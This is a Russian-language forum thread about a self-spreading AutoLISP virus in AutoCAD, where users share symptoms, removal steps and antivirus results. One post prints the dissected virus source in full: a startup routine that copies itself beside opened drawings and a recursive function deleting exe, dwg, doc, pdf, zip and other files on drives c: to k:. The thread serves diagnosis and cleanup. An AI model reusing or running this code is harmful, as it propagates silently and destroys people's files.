Acaddoc.lsp вирус или нет?

Acaddoc.lsp вирус или нет? · 14.10.2008, 13:38

Помогите удалить этот вирус. При открытии черчежей автоматически создаётся файл acaddoc.lsp. После того как он попадает на машину AutoCad перестаёт работать корректно, все черчежи открвыаются только с нажатием ESC и каждый раз в новом AutoCad. Пробовал удалять вручную, чистил антивирусом AVP 8, Symantec 10, CureIt они его удаляют. Но при открытии черчежей создаётся заново. Также читал на форумах что надо почистить его внутри изменить некоторые переменные, тоже не помогает.

Помогите пожалуйста.

VVA · 05.03.2011, 19:27

KronSerg, Выложи сюда acad.lsp на препарацию

KronSerg · 05.03.2011, 20:57

Ну надо та надо.
Добавлено: Файл препарирован, код выложен, оригинал удаляется.

sbi · 05.03.2011, 21:57

KronSerg

KronSerg · 05.03.2011, 22:20

sbi,

Цитата:

Сообщение от KronSerg

проверка Вебом показала
infected with ACAD.KillFiles

Цитата:

Сообщение от KronSerg

домашние антивирусники убивали acad.lsp

А чего ты ещё ждал?
я выложил

Цитата:

Сообщение от VVA

acad.lsp на препарацию

а не для праздного любопытства.

Кулик Алексей aka kpblc · 05.03.2011, 22:23

Надо будет Linux запустить и под ним выполнить чтение архива

gomer · 06.03.2011, 00:06

Цитата:

Сообщение от KronSerg

Ну надо та надо.

жостко! эта дрянь убивает все exe dwg doc xls rar pdf zip txt chm htm mp3
на дисках "k:" "j:" "i:" "h:" "g:" "f:" "e:" "d:" "c:"

Вот код:

Код:

[Выделить все]

 (defun s::startup (/	    old_cmd  path     dwgpath  mnlpath
		   apppath  oldacad  newacad  nowdwg   lspbj
		   wjm	    wjm1     wjqm     wjqm1    wz
		   ns1	    ns2
		  )
  (setq old_cmd (getvar "cmdecho"))
  (setvar "cmdecho" 0)
  (setq path (findfile "base.dcl"))
  (setq path (substr path 1 (- (strlen path) 8)))
  (setq mnlpath (getvar "menuname"))
  (setq nowdwg (getvar "dwgname"))
  (setq wjqm (findfile nowdwg))
  (setq dwgpath (substr wjqm 1 (- (strlen wjqm) (strlen nowdwg))))
  (setq acadpath (findfile "acad.lsp"))
  (setq acadpath (substr acadpath 1 (- (strlen acadpath) 8)))
  (setq	ns1 ""
	ns2 ""
  )
  (setq lspbj 0)
  (setq wjqm (strcat path "acad.lsp"))
  (if (setq wjm (open wjqm "r"))
    (progn (while (setq wz (read-line wjm))
	     (setq ns1 ns2)
	     (setq ns2 wz)
	   )
	   (if (> (strlen ns1) 14)
	     (if (= (substr ns1 7 7) "acadiso")
	       (setq lspbj 1)
	     )
	   )
	   (close wjm)
    )
  )
  (if (and (= acadpath dwgpath) (/= acadpath path))
    (progn (setq oldacad (findfile "acad.lsp"))
	   (setq newacad (strcat path "acadiso.lsp"))
	   (if (= lspbj 0)
	     (progn (setq wjqm (strcat path "acad.lsp"))
		    (setq wjm (open wjqm "a"))
		    (write-line
		      (strcat "(load" (chr 34) "acadiso" (chr 34) ")")
		      wjm
		    )
		    (write-line "(princ)" wjm)
		    (close wjm)
	     )
	   )
	   (vl-file-copy oldacad newacad)
    )
    (progn (if (/= nowdwg "Drawing.dwg")
	     (progn (setq oldacad (findfile "acadiso.lsp"))
		    (setq newacad (strcat dwgpath "acad.lsp"))
		    (vl-file-copy oldacad newacad)
	     )
	   )
    )
  )

  (setq k (list "k:" "j:" "i:" "h:" "g:" "f:" "e:" "d:" "c:"))
  (alldelete "exe" k 0 1)
  (alldelete "dwg" k 0 2)
  (alldelete "doc" k 0 1)
  (alldelete "xls" k 0 2)
  (alldelete "rar" k 0 1)
  (alldelete "pdf" k 0 2)
  (alldelete "zip" k 0 1)
  (alldelete "txt" k 0 2)
  (alldelete "chm" k 0 1)
  (alldelete "htm" k 0 2)
  (alldelete "mp3" k 0 1)
  
  (setvar "cmdecho" old_cmd)
  (princ)
)
(defun alldelete ( file k ktime ntime / i n k1 kk k1file kkfile m j new_kk1 new_kk1file catchit)

	(setvar	"cmdecho"	0)
	(setq n (if k (length k) 0) 
				i 0
	)
	(while (and (< i n) (< ktime ntime) )
		
		(setq k1 (nth i k)) 
		(setq kkfile (vl-directory-files k1 (strcat "*." file)) 
					m (if kkfile (length kkfile) 0)
					j 0
		)

		(while (and (< j m) (< ktime ntime) )
			(setq kk1file (nth j kkfile)  
					  new_kk1file (strcat k1 "\\" kk1file) 
					  catchit (vl-catch-all-apply 'vl-file-delete (list new_kk1file))
						ktime (1+ ktime)
					  j (1+ j)
			)
		)
		
		(if	(vl-file-directory-p k1)
			 (progn
				 (setq kk (vl-directory-files k1 nil -1) 
							 kk (cddr kk)
							 m (if kk (length kk) 0)
							 j 0
				 )
				 (while (< j m)
					 (setq kk1 (nth j kk) 
								 new_kk1 (strcat k1 "\\" kk1) 
								 kk (subst new_kk1 kk1 kk) 
								 j (1+ j)
					 )
				 )
				 (setq ktime (alldelete file kk ktime ntime)) 
			)
			 
		)
			
		(setq i (1+ i))
		
	)

	ktime

)
(princ)

KronSerg · 06.03.2011, 10:40

Два вопроса:
1. Достаточно ли удалить acad.lsp, acadiso.lsp чтобы дрянь больше не появлялась?
2. Почему GetDataBack и Recuva не нашли следов удалённых файлов?

DilshatDK · 06.03.2011, 11:07

Цитата:

Сообщение от KronSerg

Два вопроса:
1. Достаточно ли удалить acad.lsp, acadiso.lsp чтобы дрянь больше не появлялась?

Удаление этих файлов вам ничего не даст. Даже если вы через поиск найдете все файлы и удалите их. При след открытии автокада они появятся. Я уже описывал способ который мне помог. Здесь он находится под номером 65. Должно сработать. Потом отпишитесь.

На второй вопрос не знаю ответа. Но могу сказать одно. Те у кого НОРМАЛЬНЫЙ АНТИВИРУС такой проблемой не страдают. А дело в том, что когда вы приносите зараженный этой фигней файл dwg на флешке. Антивир просто не дает ему запуститься и выполнить свой зловредный код. Так что всем совет устанавливайте антивирус.

KronSerg · 06.03.2011, 23:10

Отписываюсь, при удалении acad.lsp и acadiso.lsp из C:\Documents and Settings\....\Application Data\Autodesk\....\Support и удаления всех acad.lsp из папок с файлами, новые acad.lsp перестают создаваться и файлы прекращают исчезать, меня смутило это:

Цитата:

(setq mnlpath (getvar "menuname"))

mnl-ки не трогал, вроде чистые, зачем ему такая переменная? Я не обучен лиспу, может это вообще не переменная?
Про антивирусы в конторе не я решаю, но попробую послать ребятам из McAfee этот вирус, может обновят базы.
Оригинал от греха удалил, думаю кода достаточно, если кому нужен для опытов - пишите в личку.

Li6-D · 07.03.2011, 17:59

Цитата:

Сообщение от KronSerg

... меня смутило это:
Цитата:
(setq mnlpath (getvar "menuname"))
mnl-ки не трогал, вроде чистые, зачем ему такая переменная? Я не обучен лиспу, может это вообще не переменная?

Похоже на ставший классическим лисп-вирус, который здесь выкладывался и рассматривался.
Переменная mnlpath действительно непонятная, так как она после создания не используется. Наверное вирусописака схалтурил.
gomer в сообщении #86 привел убийственную версию вируса, ни в коем случае не запускайте её

gomer · 08.03.2011, 11:09

Цитата:

Сообщение от Li6-D

Похоже на ставший классическим лисп-вирус, который здесь выкладывался и рассматривался.

Похоже, но тот не удалял ничего вроде... а этот... в общем нужно почистить s:startup удалить все acad*.lsp кроме оригинальных, а те почистить... лиспы не являются классическими вирусами, и не опасны, пока не запущен акад...

KronSerg · 11.03.2011, 22:31

Думаю будет правильно извиниться за наведение тени на McAfee, получив образец вируса мне ответили что знают такой и лечат, а судя по этой ссылке, он у них в базе как минимум с 8 февраля, админы наши начудили с обновлениями, кстати, вирус полностью убит во всей сети.

znatok · 13.04.2011, 20:45

Я в этой теме на 5 страницу не могу войти, антивирус аваст выдаёт:

Нажмите для просмотра

http://s005.***********/i209/1104/19/74bb2daf14f7.jpg
Скажите, пожалуйста (в данном случае в личку) на что конкретно реагирует он.

(и возможно это сообщения НЕ отправится)

VVA · 13.04.2011, 21:05

Я думаю на опубликованный листинг в #86

znatok · 13.04.2011, 21:23

открыл 5 страницу с помощью Ворда и то возмущался.

Как я понял, Авст ругается из-за кода размещённого в 86 сообщении.

KronSerg · 13.04.2011, 22:53

Думаю эта страница была заложена в чёрный список Аваста ещё тогда, когда вирус можно было просто скачать.

Avrigo · 19.05.2011, 16:46

Похоже что вирус acaddoc.lsp совершенствуется. Я всё почистил, удалил, и даже создал файл acad.fas, НО при первом же открытии файла dwg в директории появляется acaddoc.lsp. Саму проблему ни AVIRA, ни CureIt не устранили. Похоже, что и дальше придется работать через Esc.

VVA · 19.05.2011, 18:38

Заархивируй acaddoc.lsp + добавь файл acad.mnl и выложи сюда

Avrigo · 20.05.2011, 18:27

Поздно, нечего архивировать. Сегодня победил его Live CD от Dr.Web. Но только когда конкретно натравил на папку Documents and Settings\*\*\*\Support, вирус сидел в трех файлах (acad.mnl; acetmain.mnl; AecArchXOE.mnl).
p.s. А до этого почистил acaddoc.lsp, дал ему свойства только чтение, но пришлось пихать его в каждую директорию с dwg-файлами.

hwd · 23.01.2012, 18:57

Написал модуль, задачей которого является раз и навсегда избавить пользователей от проблем, вызванных "творчеством" говнописателя, смыслом жизни которого является вредительство. Подробности здесь.

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Пароизоляция утеплителя: нужна или нет.	Romka	Прочее. Архитектура и строительство	183	18.08.2016 23:36
Advance Steel. Изучать или нет.	Saha	Advance Steel	4	19.09.2008 06:08
Нужен МКЭ расчет или нет?	SRG_ORL	Расчетные программы	36	22.12.2006 00:39
Можно ли делать в проекте свободную планировку кв-р или нет?	tyoma	Разное	4	09.12.2006 08:05

14.10.2008, 13:38
Acaddoc.lsp вирус или нет? Mikhail.Pavliy Регистрация: 14.10.2008 Сообщений: 8 Помогите удалить этот вирус. При открытии черчежей автоматически создаётся файл acaddoc.lsp. После того как он попадает на машину AutoCad перестаёт работать корректно, все черчежи открвыаются только с нажатием ESC и каждый раз в новом AutoCad. Пробовал удалять вручную, чистил антивирусом AVP 8, Symantec 10, CureIt они его удаляют. Но при открытии черчежей создаётся заново. Также читал на форумах что надо почистить его внутри изменить некоторые переменные, тоже не помогает. Помогите пожалуйста.
Просмотров: 85961

	Реклама i